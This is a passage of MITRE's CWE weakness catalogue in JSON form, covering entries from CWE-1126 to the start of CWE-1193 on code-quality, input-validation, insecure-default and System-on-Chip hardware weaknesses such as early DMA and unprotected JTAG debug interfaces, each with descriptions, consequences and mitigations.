Relationships"}}},"1126":{"attr":{"@_ID":"1126","@_Name":"Declaration of Variable with Unnecessarily Wide Scope","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The source code declares a variable in one scope, but the\\n\\t\\t\\t\\t\\tvariable is only used within a narrower scope.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to understand and/or maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1127":{"attr":{"@_ID":"1127","@_Name":"Compilation with Insufficient Warnings or Errors","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code is compiled without sufficient warnings enabled, which\\n\\t\\t\\t\\t\\tmay prevent the detection of subtle bugs or quality\\n\\t\\t\\t\\t\\tissues.","Extended_Description":{"xhtml:p":"This issue makes it more difficult to maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities.  It also might make it easier to introduce vulnerabilities."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Build and Compilation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-07-02","Submission_Comment":"Entry derived from Common Quality Enumeration (CQE) Draft 0.9."}}},"1164":{"attr":{"@_ID":"1164","@_Name":"Irrelevant Code","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program contains code that is not essential for execution,\\n\\t     i.e. makes no state changes and has no side effects that alter\\n\\t     data or control flow, such that removal of the code would have no impact\\n\\t     to functionality or correctness.","Extended_Description":{"xhtml:p":"Irrelevant code could include dead code,\\n\\t     initialization that is not used, empty blocks, code that could be entirely\\n\\t     removed due to optimization, etc."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Reduce Reliability"},{"Scope":"Other","Impact":"Reduce Performance"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-02"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1173":{"attr":{"@_ID":"1173","@_Name":"Improper Use of Validation Framework","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application does not use, or incorrectly uses, an input validation framework that is provided by the source language or an independent library.","Extended_Description":"Many modern coding languages provide developers with input validation frameworks to make the task of input validation easier and less error-prone. These frameworks will automatically check all input against specified criteria and direct execution to error handlers when invalid input is received. The improper use (i.e., an incorrect implementation or missing altogether) of these frameworks is not directly exploitable, but can lead to an exploitable condition if proper input validation is not performed later in the application. Not using provided input validation frameworks can also hurt the maintainability of code as future developers may not recognize the downstream input validation being used in the place of the validation framework.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may occur when software designers choose to not leverage input validation frameworks provided by the source language."},{"Phase":"Implementation","Note":"This weakness may occur when developers do not correctly use a provided input validation framework."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others."}},"Detection_Methods":{"Detection_Method":{"attr":{"@_Detection_Method_ID":"DM-3"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["Some instances of improper input validation can be detected using automated static analysis.","A static analysis tool might allow the user to specify which application-specific methods or functions perform input validation; the tool might also have built-in knowledge of validation frameworks such as Struts. The tool may then suppress or de-prioritize any associated warnings. This allows the analyst to focus on areas of the software in which input validation does not appear to be present.","Except in the cases described in the previous paragraph, automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes."]}}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Properly use provided input validation frameworks."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-12-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"}]}},"1174":{"attr":{"@_ID":"1174","@_Name":"ASP.NET Misconfiguration: Improper Model Validation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The ASP.NET application does not use, or incorrectly uses, the model validation framework.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others."}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2018-12-21"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1176":{"attr":{"@_ID":"1176","@_Name":"Inefficient CPU Computation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The program performs CPU computations using\\n         algorithms that are not as efficient as they could be for the\\n         needs of the developer, i.e., the computations can be\\n         optimized further.","Extended_Description":{"xhtml:p":"This issue can make the software perform more slowly, possibly in ways that are noticeable to the users.  If an attacker can influence the amount of computation that must be performed, e.g. by triggering worst-case complexity, then this performance problem might introduce a vulnerability."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"405","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)"},{"Scope":"Other","Impact":"Reduce Performance"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1008"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}}},"1177":{"attr":{"@_ID":"1177","@_Name":"Use of Prohibited Code","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses a function, library, or third party component\\n\\t     that has been explicitly prohibited, whether by the developer or\\n\\t     the customer.","Extended_Description":{"xhtml:p":["The developer - or customers - may wish to restrict or eliminate use of a function, library, or third party component for any number of reasons, including real or suspected vulnerabilities; difficulty to use securely; export controls or license requirements; obsolete or poorly-maintained code; internal code being scheduled for deprecation; etc.","To reduce risk of vulnerabilities, the developer might maintain a list of \\"banned\\" functions that programmers must avoid using because the functions are difficult or impossible to use securely.  This issue can also make the software more costly and difficult to maintain."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Indirect"},{"Ordinality":"Primary"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Reduce Maintainability"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1009"}},{"attr":{"@_External_Reference_ID":"REF-1010"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-01-03"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}}},"1187":{"attr":{"@_ID":"1187","@_Name":"DEPRECATED: Use of Uninitialized Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-908. All content has been transferred to CWE-908.","Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-03-25"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Name, Relationships, Type, Weakness_Ordinalities"},"Previous_Entry_Name":{"#text":"Use of Uninitialized Resource","attr":{"@_Date":"2020-02-24"}}}},"1188":{"attr":{"@_ID":"1188","@_Name":"Insecure Default Initialization of Resource","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software initializes or sets a resource with a default that is intended to be changed by the administrator, but the default is not secure.","Extended_Description":{"xhtml:p":"Developers often choose default values that leave the software as open and easy to use as possible out-of-the-box, under the assumption that the administrator can (or should) change the default value.  However, this ease-of-use comes at a cost when the default is insecure and the administrator does not change it."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"665"}}},"Notes":{"Note":{"#text":"This entry improves organization of concepts under initialization.  The typical CWE model is to cover \\"Missing\\" and \\"Incorrect\\" behaviors.  Arguably, this entry could be named as \\"Incorrect\\" instead of \\"Insecure.\\"  This might be changed in the near future.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-03-25"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1189":{"attr":{"@_ID":"1189","@_Name":"Improper Isolation of Shared Resources on System-on-a-Chip (SoC)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The System-On-a-Chip (SoC) does not properly isolate shared resources between trusted and untrusted agents.","Extended_Description":{"xhtml:p":"A System-On-a-Chip (SoC) has a lot of functionality, but it may have a limited number of pins or pads. A pin can only perform one function at a time. However, it can be configured to perform multiple different functions. This technique is called pin multiplexing. Similarly, several resources on the chip may be shared to multiplex and support different features or functions. When such resources are shared between trusted and untrusted agents, untrusted agents may be able to access the assets intended to be accessed only by the trusted agents."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"653","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1331","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If resources being used by a trusted user are shared with an untrusted user, the untrusted user may be able to modify the functionality of the shared resource of the trusted user."},{"Scope":"Integrity","Impact":"Quality Degradation","Note":"The functionality of the shared resource may be intentionally degraded."}]},"Detection_Methods":{"Detection_Method":{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"Kernel integrity verification can help identify when shared resource configuration settings have been modified."},"Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["When sharing resources, avoid mixing agents of varying trust levels.","Untrusted agents should not share resources with trusted agents."]}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider the following SoC\\n\\t      design. The Hardware Root of Trust (HRoT) local SRAM is memory mapped in the core{0-N}\\n\\t      address space. The HRoT allows or disallows access to private memory ranges, thus\\n\\t      allowing the sram to function as a mailbox for communication between untrusted and\\n\\t      trusted HRoT partitions.","Body_Text":{"xhtml:img":{"attr":{"@_src":"https://cwe.mitre.org/data/images/HRoT-CWE.png","@_alt":"Hardware Root of Trust"}},"xhtml:p":"We assume that the threat is from malicious software in\\n\\t      the untrusted domain. We assume this software has access\\n\\t      to the core{0-N} memory map and can be running at any\\n\\t      privilege level on the untrusted cores. The capability\\n\\t      of this threat in this example is communication to and\\n\\t      from the mailbox region of SRAM modulated by the\\n\\t      hrot_iface. To address this threat, information must not\\n\\t      enter or exit the shared region of SRAM through\\n\\t      hrot_iface when in secure or privileged mode."}}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-6260","Description":"Baseboard Management Controller (BMC) device implements Advanced High-performance Bus (AHB) bridges that do not require authentication for arbitrary read and write access to the BMC\'s physical address space from the host, and possibly the network [REF-1138].","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6260"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"124"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1036"}},{"attr":{"@_External_Reference_ID":"REF-1138"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-07-16","Contribution_Comment":"Provided Demonstrative Example for Hardware Root of Trust"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"provided observed example"}],"Previous_Entry_Name":{"#text":"Improper Isolation of Shared Resources on System-on-Chip (SoC)","attr":{"@_Date":"2020-08-20"}}}},"1190":{"attr":{"@_ID":"1190","@_Name":"DMA Device Enabled Too Early in Boot Phase","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product enables a Direct Memory Access (DMA) capable device before the security configuration settings are established, which allows an attacker to extract data from or gain privileges on the product.","Extended_Description":{"xhtml:p":"DMA is included in a number of devices because it allows\\n              data transfer between the computer and the connected device, using\\n              direct hardware access to read or write directly to main memory\\n              without any OS interaction. An attacker could exploit this to\\n              access secrets. Several virtualization-based mitigations have been introduced to thwart DMA attacks. These are usually\\n              configured/setup during boot time. However, certain IPs that are\\n              powered up before boot is complete (known as early boot IPs) may\\n              be DMA capable. Such IPs, if not trusted, could launch DMA\\n              attacks and gain access to assets that should otherwise be\\n              protected."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Modify Memory"],"Likelihood":"High","Note":"DMA devices have direct write access to main memory and\\n                 due to time of attack will be able to bypass OS or Bootloader\\n                 access control."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Utilize an IOMMU to orchestrate IO access from\\n                 the start of the boot process."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1038"}},{"attr":{"@_External_Reference_ID":"REF-1039"}},{"attr":{"@_External_Reference_ID":"REF-1040"}},{"attr":{"@_External_Reference_ID":"REF-1041"}},{"attr":{"@_External_Reference_ID":"REF-1042"}},{"attr":{"@_External_Reference_ID":"REF-1044"}},{"attr":{"@_External_Reference_ID":"REF-1046"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1191":{"attr":{"@_ID":"1191","@_Name":"On-Chip Debug and Test Interface With Improper Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The chip does not implement or does not correctly perform access control to check whether users are authorized to access internal registers and test modes through the physical debug/test interface.","Extended_Description":{"xhtml:p":["A device\'s internal information may be accessed through a scan chain of interconnected internal registers, usually through a JTAG interface. The JTAG interface provides access to these registers in a serial fashion in the form of a scan chain for the purposes of debugging programs running on a device. Since almost all information contained within a device may be accessed over this interface, device manufacturers typically insert some form of authentication and authorization to prevent unintended use of this sensitive information. This mechanism is implemented in addition to on-chip protections that are already present.","If authorization, authentication, or some other form of access control is not implemented or not implemented correctly, a user may be able to bypass on-chip protection mechanisms through the debug interface."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Likelihood":"High"},{"Scope":"Confidentiality","Impact":"Read Memory","Likelihood":"High"},{"Scope":"Authorization","Impact":"Execute Unauthorized Code or Commands","Likelihood":"High"},{"Scope":"Integrity","Impact":"Modify Memory","Likelihood":"High"},{"Scope":"Integrity","Impact":"Modify Application Data","Likelihood":"High"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High"}]},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"Authentication and authorization of debug and test interfaces should be part of the architecture and design review process. Withholding of private register documentation from the debug and test interface public specification (\\"Security by obscurity\\") should not be considered as sufficient security."}},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"Dynamic tests should be done in the pre-silicon and post-silicon stages to verify that the debug and test interfaces are not open by default."}},{"Method":"Fuzzing","Description":"Tests that fuzz Debug and Test Interfaces should ensure that no access without appropriate authentication and authorization is possible.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"If feasible, the manufacturer should disable the JTAG interface or implement authentication and authorization for the JTAG interface. If authentication logic is added, it should be resistant to timing attacks. Security-sensitive data stored in registers, such as keys, etc. should be cleared when entering debug mode.","Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A home, WiFi-router device implements a login prompt which prevents an unauthorized user from issuing any commands on the device until appropriate credentials are provided. The credentials are protected on the device and are checked for strength against attack.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:p":["If the JTAG interface on this device is not hidden by the manufacturer, the interface may be identified using tools such as JTAGulator. If it is hidden but not disabled, it can be exposed by physically wiring to the board.",{"#text":"By issuing acommand before the OS starts, the unauthorized user pauses the watchdog timer and prevents the router from restarting (once the watchdog timer would have expired). Having paused the router, an unauthorized user is able to execute code and inspect and modify data in the device, even extracting all of the router\'s firmware. This allows the user to examine the router and potentially exploit it.","xhtml:b":"halt"}]},{"#text":"In order to prevent exposing the debugging interface, manufacturers might try to obfuscate the JTAG interface or blow device internal fuses to disable the JTAG interface. Adding authentication and authorization to this interface makes use by unauthorized individuals much more difficult.","attr":{"@_Nature":"good","@_Language":"Other"}}],"Body_Text":"JTAG is useful to chip and device manufacturers during design, testing, and production and is included in nearly every product. Without proper authentication and authorization, the interface may allow tampering with a product."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2019-18827","Description":"chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption keys","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1037"}},{"attr":{"@_External_Reference_ID":"REF-1043"}},{"attr":{"@_External_Reference_ID":"REF-1084"}},{"attr":{"@_External_Reference_ID":"REF-1085"}}]},"Notes":{"Note":{"#text":"CWE-1191 and CWE-1244 both involve physical debug access,\\n\\t  but the weaknesses are different. CWE-1191 is effectively\\n\\t  about missing authorization for a debug interface,\\n\\t  i.e. JTAG.  CWE-1244 is about providing internal assets with\\n\\t  the wrong debug access level, exposing the asset to\\n\\t  untrusted debug agents.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Name":"Parbati K. Manna","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-18","Contribution_Comment":"provided detection methods"},{"attr":{"@_Type":"Feedback"},"Contribution_Name":"Narasimha Kumar V Mangipudi","Contribution_Organization":"Lattice Semiconductor","Contribution_Date":"2021-10-20","Contribution_Comment":"reviewed content changes"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Hareesh Khattri","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-22","Contribution_Comment":"clarified differences between CWE-1191 and CWE-1244"}],"Previous_Entry_Name":[{"#text":"Exposed Chip Debug Interface With Insufficient Access Control","attr":{"@_Date":"2020-02-26"}},{"#text":"Exposed Chip Debug and or Test Interface With Insufficient Access Control","attr":{"@_Date":"2020-08-20"}}]}},"1192":{"attr":{"@_ID":"1192","@_Name":"System-on-Chip (SoC) Using Components without Unique, Immutable Identifiers","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The System-on-Chip (SoC) does not have unique, immutable identifiers for each of its components.","Extended_Description":{"xhtml:p":["A System-on-Chip (SoC) comprises several components (IP) with varied\\n           trust requirements. It is required that each IP is identified\\n           uniquely and should distinguish itself from other entities in\\n           the SoC without any ambiguity. The unique secured identity is\\n           required for various purposes. Most of the time the identity is used\\n           to route a transaction or perform certain actions, including \\n           resetting, retrieving a sensitive information, and acting upon or on\\n           behalf of something else.","There are several variants of this weakness:"],"xhtml:ul":{"xhtml:li":["A \\"missing\\" identifier is when the SoC does not define\\n\\t      any mechanism to uniquely identify the IP.","An \\"insufficient\\" identifier might provide\\n\\t      some defenses - for example, against the most common\\n\\t      attacks - but it does not protect against everything\\n\\t      that is intended.","A \\"misconfigured\\" mechanism occurs when a mechanism\\n              is available but not implemented correctly.","An \\"ignored\\" identifier occurs when the SoC/IP has not applied\\n\\t      any policies or does not act upon the identifier securely."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":"Every identity generated in the SoC should be unique and\\n                    immutable in hardware. The actions that an IP is trusted or\\n                    not trusted should be clearly defined, implemented,\\n                    configured, and tested. If the definition is implemented via a\\n                    policy, then the policy should be immutable or protected with\\n                    clear authentication and authorization."}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"113"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1193":{"attr":{"@_ID":"1193","@_Name":"Power-On of Untrusted Execution Core Before Enabling Fabric Access Control","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product enables components that contain untrusted firmware before memory and fabric access controls have been enabled.","Extended_Description":{"xhtml:p":"After initial reset, System-on-Chip (SoC) fabric access controls and other\\n           security features need to be programmed by trusted firmware as part\\n           of the boot sequence. If untrusted IPs or peripheral microcontrollers\\n\\t   are enabled first, then the untrusted component can master\\n           transactions on the hardware bus and target memory or other assets to\\n           compromise the SoC boot firmware."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Likelihood":"High","Note":"An untrusted component can master transactions on the HW bus and target memory or other assets to compromise the SoC boot firmware."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"The boot sequence should enable fabric access controls and memory protections before enabling third-party hardware IPs and peripheral microcontrollers that use untrusted firmware."}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1130"}},{"attr":{"@_External_Reference_ID":"REF-1042"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V 